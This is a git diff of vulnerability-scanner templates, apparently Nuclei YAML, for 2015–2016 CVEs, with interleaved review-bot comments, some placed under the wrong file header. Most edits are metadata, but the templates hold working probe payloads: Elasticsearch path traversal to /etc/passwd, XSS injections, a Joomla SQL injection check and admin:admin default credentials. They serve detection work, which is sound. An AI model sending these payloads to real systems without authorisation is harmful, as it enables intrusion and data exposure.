a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 08f1d99ac5..bb26a89b34 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml 
@@ -15,9 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-5469 cwe-id: CWE-22 - tags: cve,cve2015,wp,lfi + epss-score: 0.02176 + cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: mdc_youtube_downloader_project + product: mdc_youtube_downloader + tags: cve,cve2015,wp,lfi http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index df75875d9c..31a794faa6 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -10,15 +10,21 @@ info: - http://www.vapid.dhs.org/advisory.php?v=134 - https://nvd.nist.gov/vuln/detail/CVE-2015-5471 - http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html + - http://michaelwalsh.org/blog/2015/07/wp-swimteam-v1-45-beta-3-now-available/ remediation: Upgrade to Swim Team version 1.45 or newer. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2015-5471 cwe-id: CWE-22 + epss-score: 0.1035 + cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/wp-swimteam" + framework: wordpress + vendor: swim_team_project + product: swim_team tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,packetstorm http: @@ -28,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index c4a0d355fc..a348a4d5cc 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml 
@@ -3,21 +3,26 @@ id: CVE-2015-5531 info: name: ElasticSearch <1.6.1 - Local File Inclusion author: princechaddha - severity: high + severity: medium description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls. reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531 - https://nvd.nist.gov/vuln/detail/CVE-2015-5531 - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html - https://www.elastic.co/community/security/ + - http://packetstormsecurity.com/files/133797/ElasticSearch-Path-Traversal-Arbitrary-File-Download.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-5531 cwe-id: CWE-22 - tags: vulhub,packetstorm,cve,cve2015,elasticsearch + epss-score: 0.97074 + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 3 + vendor: elasticsearch + product: elasticsearch + tags: vulhub,packetstorm,cve,cve2015,elasticsearch,intrusive http: - raw: @@ -31,7 +36,6 @@ http: "location": "/usr/share/elasticsearch/repo/test" } } - - | PUT /_snapshot/test2 HTTP/1.1 Host: {{Hostname}} @@ -42,7 +46,6 @@ http: "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" } } - - | GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 Host: {{Hostname}} @@ -52,9 +55,9 @@ http: - type: word part: body words: - - 'ElasticsearchParseException' - - 'Failed to derive xcontent from' - - '114, 111, 111, 116, 58' + - ElasticsearchParseException + - Failed to derive xcontent from + - 114, 111, 111, 116, 58 condition: and - type: status diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index e30a742823..bf5ca44f41 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml 
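Review bot: The `intrusive` tag is appended to `tags:` in the first hunk, but nothing in the template says why; the raw requests visible in the later hunks (`PUT /_snapshot/test2`, a repository `location` under `/usr/share/elasticsearch/repo/test`) register snapshot repositories on the scanned node, and none of the visible hunks removes them afterwards. A comment above `- raw:` such as `# registers snapshot repositories on the target and does not remove them (reason for the intrusive tag)` would make that side effect visible to whoever runs it. In the last hunk the word list is unquoted; `- 114, 111, 111, 116, 58` still parses as a single plain string inside a block sequence, but the commas make it fragile if the list is ever rewritten in flow style, so keeping the single quotes on that entry is the safer choice. The first raw request and the remaining matchers lie outside these hunks.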
@@ -3,21 +3,27 @@ id: CVE-2015-5688 info: name: Geddy <13.0.8 - Local File Inclusion author: pikpikcu - severity: high + severity: medium description: Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI. reference: - https://nodesecurity.io/advisories/geddy-directory-traversal - https://github.com/geddy/geddy/issues/697 - https://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231 - https://nvd.nist.gov/vuln/detail/CVE-2015-5688 + - https://github.com/geddy/geddy/pull/699 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-5688 cwe-id: CWE-22 - tags: cve,cve2015,geddy,lfi + epss-score: 0.01347 + cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:* metadata: max-request: 1 + framework: node.js + vendor: geddyjs + product: geddy + tags: cve,cve2015,geddy,lfi http: - method: GET @@ -27,9 +33,9 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index d2e7562f3a..065d615e02 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml 
@@ -9,19 +9,26 @@ info: - https://seclists.org/fulldisclosure/2015/Dec/117 - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01 - https://nvd.nist.gov/vuln/detail/CVE-2015-6477 + - http://packetstormsecurity.com/files/135068/Nordex-Control-2-NC2-SCADA-16-Cross-Site-Scripting.html + - http://seclists.org/fulldisclosure/2015/Dec/117 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-6477 cwe-id: CWE-79 - tags: xss,iot,nordex,nc2,seclists,cve,cve2015 + epss-score: 0.00357 + cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nordex + product: nordex_control_2_scada + tags: seclists,packetstorm,xss,iot,nordex,nc2,cve,cve2015 http: - method: POST path: - "{{BaseURL}}/login" + body: 'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en' matchers-condition: and diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index ae22fdf5e5..1261c787aa 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -16,9 +16,13 @@ info: cvss-score: 6.1 cve-id: CVE-2015-6544 cwe-id: CWE-79 - tags: cve,cve2015,xss,itop + epss-score: 0.00284 + cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: combodo + product: itop + tags: cve,cve2015,xss,itop http: - method: GET @@ -28,15 +32,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index da58178b3c..a2692810fd 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml 
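Review bot: The added reference `http://seclists.org/fulldisclosure/2015/Dec/117` duplicates the existing `https://seclists.org/fulldisclosure/2015/Dec/117` entry two lines above it, differing only in scheme; drop the new line. The rest of the hunk (tag reordering, epss/cpe/vendor/product, the new `body:`) follows the pattern used by the other templates in this commit, and the `body:` carries `{{randstr}}` in the reflected value, which keeps the match specific to this request. The matchers that check the reflection are outside the hunk.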
@@ -11,12 +11,17 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-6920 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2015-6920 cwe-id: CWE-79 - cvss-score: 4.3 - tags: wp-plugin,xss,packetstorm,cve,cve2015,wordpress + epss-score: 0.0016 + cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: sourceafrica_project + product: sourceafrica + tags: wp-plugin,xss,packetstorm,cve,cve2015,wordpress http: - method: GET @@ -26,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '">' - part: body - type: word part: header diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 278f264a7a..dadc000d42 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -15,9 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2015-7245 cwe-id: CWE-22 - tags: cve,cve2015,dlink,lfi,packetstorm,edb + epss-score: 0.96881 + cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: d-link + product: dvg-n5402sp_firmware + tags: cve,cve2015,dlink,lfi,packetstorm,edb http: - raw: diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index 9bd22d4801..74a7eda1cf 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml 
@@ -9,15 +9,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-7297 - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/ + - http://packetstormsecurity.com/files/134097/Joomla-3.44-SQL-Injection.html + - http://packetstormsecurity.com/files/134494/Joomla-Content-History-SQL-Injection-Remote-Code-Execution.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2015-7297 cwe-id: CWE-89 - tags: cve,cve2015,joomla,sqli + epss-score: 0.97564 + cpe: cpe:2.3:a:joomla:joomla\!:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 - + vendor: joomla + product: joomla\! + tags: packetstorm,cve,cve2015,joomla,sqli variables: num: "999999999" @@ -28,6 +33,6 @@ http: matchers: - type: word + part: body words: - '{{md5({{num}})}}' - part: body diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 4d839acc00..38ba59a2fc 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -10,14 +10,20 @@ info: - https://github.com/GTSolutions/Pie-Register/blob/2.0.19/readme.txt - https://nvd.nist.gov/vuln/detail/CVE-2015-7377 - http://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html + - https://wpvulndb.com/vulnerabilities/8212 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-7377 cwe-id: CWE-79 - tags: cve2015,wordpress,wp-plugin,xss,packetstorm,cve + epss-score: 0.00239 + cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: genetechsolutions + product: pie_register + tags: cve2015,wordpress,wp-plugin,xss,packetstorm,cve http: - method: GET 
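Review bot: The blank line removed after `max-request: 1` is not restored after the relocated `tags:` line, so `variables:` now follows the `info` block with no separator, while the other templates in this commit keep one blank line before the next top-level key; add an empty line between `tags: packetstorm,cve,cve2015,joomla,sqli` and `variables:`. Separately, `product: joomla\!` is a plain scalar, so the backslash is kept literally and the value is the CPE-escaped form rather than the name `joomla!`; if `product` is meant to mirror the CPE component verbatim that is fine, otherwise write `product: 'joomla!'`.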
@@ -27,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 1da31ff342..e0915a593a 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -10,14 +10,19 @@ info: - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - http://www-01.ibm.com/support/docview.wss?uid=swg21972799 + - http://www-01.ibm.com/support/docview.wss?uid=swg21970575 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2015-7450 cwe-id: CWE-94 + epss-score: 0.97411 + cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"IBM WebSphere Portal" + vendor: ibm + product: tivoli_common_reporting tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java,kev http: @@ -44,10 +49,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 500 - - type: word words: - 'SOAP-ENV:Server' @@ -55,6 +56,10 @@ http: condition: and - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" + + - type: status + status: + - 500 diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 222859c369..adb50e8858 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml 
@@ -15,9 +15,13 @@ info: cvss-score: 6.5 cve-id: CVE-2015-7780 cwe-id: CWE-22 - tags: manageengine,edb,cve,cve2015,lfi + epss-score: 0.00151 + cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zohocorp + product: manageengine_firewall_analyzer + tags: manageengine,edb,cve,cve2015,lfi http: - method: GET @@ -26,18 +30,18 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word + part: body words: - "" - "java.sun.com" - part: body condition: and - type: word part: header words: - "application/xml" + + - type: status + status: + - 200 diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 6f929c78f4..6ebbc77776 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -3,7 +3,7 @@ id: CVE-2015-7823 info: name: Kentico CMS 8.2 - Open Redirect author: 0x_Akoko - severity: low + severity: medium description: Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. reference: - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html @@ -11,12 +11,16 @@ info: - http://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-score: 5.8 cve-id: CVE-2015-7823 cwe-id: NVD-CWE-Other - cvss-score: 5.8 - tags: cve,cve2015,kentico,redirect,packetstorm + epss-score: 0.00233 + cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kentico + product: kentico_cms + tags: cve,cve2015,kentico,redirect,packetstorm http: - method: GET 
@@ -25,6 +29,6 @@ http: matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - part: header diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index 258594b64c..c09e5962d7 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -7,16 +7,19 @@ info: description: SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php. reference: - https://www.htbridge.com/advisory/HTB23273 - - http://web.archive.org/web/20201207072921/https://www.securityfocus.com/archive/1/537018/100/0/threaded - https://nvd.nist.gov/vuln/detail/CVE-2015-8349 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2015-8349 cwe-id: CWE-79 - tags: cve,cve2015,xss,sourcebans + epss-score: 0.00127 + cpe: cpe:2.3:a:gameconnect:sourcebans:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: gameconnect + product: sourcebans + tags: cve,cve2015,xss,sourcebans http: - method: GET @@ -26,15 +29,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/ + + - type: status + status: + - 200 diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index c0567939c9..b85cb15a2f 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml 
@@ -8,16 +8,19 @@ info: reference: - https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro - https://www.exploit-db.com/exploits/39170/ - - http://web.archive.org/web/20201209041130/https://www.securityfocus.com/archive/1/537232/100/0/threaded - https://nvd.nist.gov/vuln/detail/CVE-2015-8399 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2015-8399 cwe-id: CWE-200 + epss-score: 0.9647 + cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Atlassian Confluence" + vendor: atlassian + product: confluence tags: edb,cve,cve2015,atlassian,confluence http: @@ -27,13 +30,13 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - "confluence-init.properties" - "View Default Decorator" condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index 01fd5cdc21..482af0b3c6 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -10,14 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce - http://www.openwall.com/lists/oss-security/2016/02/18/8 + - http://issues.umbraco.org/issue/U4-7457 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N cvss-score: 8.2 cve-id: CVE-2015-8813 cwe-id: CWE-918 - tags: cve,cve2015,ssrf,oast,umbraco + epss-score: 0.00511 + cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: umbraco + product: umbraco + tags: cve,cve2015,ssrf,oast,umbraco http: - method: GET @@ -26,6 +31,6 @@ http: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" 
diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index e2ce486f4f..41008b0b18 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -17,9 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2015-9312 cwe-id: CWE-79 + epss-score: 0.00088 + cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 verified: true + framework: wordpress + vendor: newstatpress_project + product: newstatpress tags: cve2015,xss,authenticated,wp,newstatpress,wpscan,cve,wordpress,wp-plugin http: @@ -30,7 +35,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index 63958d0234..ee33cc0eea 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -15,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2015-9414 cwe-id: CWE-79 - cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:*:*:* epss-score: 0.00111 + cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/wp-symposium" + framework: wordpress + vendor: wpsymposiumpro + product: wp-symposium tags: xss,wpscan,cve,cve2015,wordpress,wp-plugin http: @@ -30,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index 26e2c6602a..08a5002865 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml 
@@ -13,11 +13,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-9480 cwe-id: CWE-22 - cpe: cpe:2.3:a:robot-cpa:robotcpa:*:*:*:*:*:*:*:* - epss-score: 0.14215 + epss-score: 0.23765 + cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/robotcpa" + framework: wordpress + vendor: robot-cpa + product: robotcpa tags: wp-plugin,lfi,edb,cve,cve2015,wordpress http: @@ -28,9 +31,10 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body + - type: status status: - 200 diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 0aab723032..79066d1546 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -13,26 +13,32 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-0957 + epss-score: 0.06304 + cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" + vendor: adobe + product: dispatcher tags: cve,cve2016,adobe,aem http: - method: GET path: - "{{BaseURL}}/system/console?.css" + headers: Authorization: "Basic YWRtaW46YWRtaW4K" matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - "Adobe" - "java.lang" - "(Runtime)" condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index 66f11268cc..9c24a4852d 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml 
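Review bot: `Authorization: "Basic YWRtaW46YWRtaW4K"` decodes to `admin:admin` followed by a newline (the trailing `K` encodes `\n`, the usual result of base64-encoding `echo` output without `-n`); the commit leaves this context line untouched, but a server that does not strip the newline will reject the credential and the template will silently report nothing, so re-encode the value without the trailing newline. The status-matcher move and the blank line added before `headers:` are fine; the rest of the template is outside the hunk.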
@@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=526 - https://wordpress.org/plugins/admin-font-editor - - http://web.archive.org/web/20210123183728/https://www.securityfocus.com/bid/93896/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000126 cwe-id: CWE-79 + epss-score: 0.00119 + cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/admin-font-editor" + framework: wordpress + vendor: admin-font-editor_project + product: admin-font-editor tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 9b80d2946f..44fbc48f3f 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=494 - https://wordpress.org/plugins/ajax-random-post - - http://web.archive.org/web/20210614214105/https://www.securityfocus.com/bid/93895 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000127 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00119 + cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: ajax-random-post_project + product: ajax-random-post + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header 
diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index b6131780cf..474d5fe824 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -14,9 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000128 cwe-id: CWE-79 + epss-score: 0.001 + cpe: cpe:2.3:a:anti-plagiarism_project:anti-plagiarism:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/anti-plagiarism" + framework: wordpress + vendor: anti-plagiarism_project + product: anti-plagiarism tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index 134b362cb5..65dab23dea 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -8,16 +8,20 @@ info: reference: - https://wordpress.org/plugins/defa-online-image-protector - http://www.vapidlabs.com/wp/wp_advisory.php?v=449 - - http://web.archive.org/web/20210614204644/https://www.securityfocus.com/bid/93892 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000129 cwe-id: CWE-79 + epss-score: 0.00119 + cpe: cpe:2.3:a:defa-online-image-protector_project:defa-online-image-protector:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/defa-online-image-protector" + framework: wordpress + vendor: defa-online-image-protector_project + product: defa-online-image-protector tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header 
diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index f46050c8d1..461dee8a7a 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -14,9 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000130 cwe-id: CWE-79 + epss-score: 0.00093 + cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/e-search" + framework: wordpress + vendor: e-search_project + product: e-search tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index 59d07e99cb..1b80c03b1a 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=393 - https://wordpress.org/plugins/e-search - - http://web.archive.org/web/20210123183536/https://www.securityfocus.com/bid/93867/ - 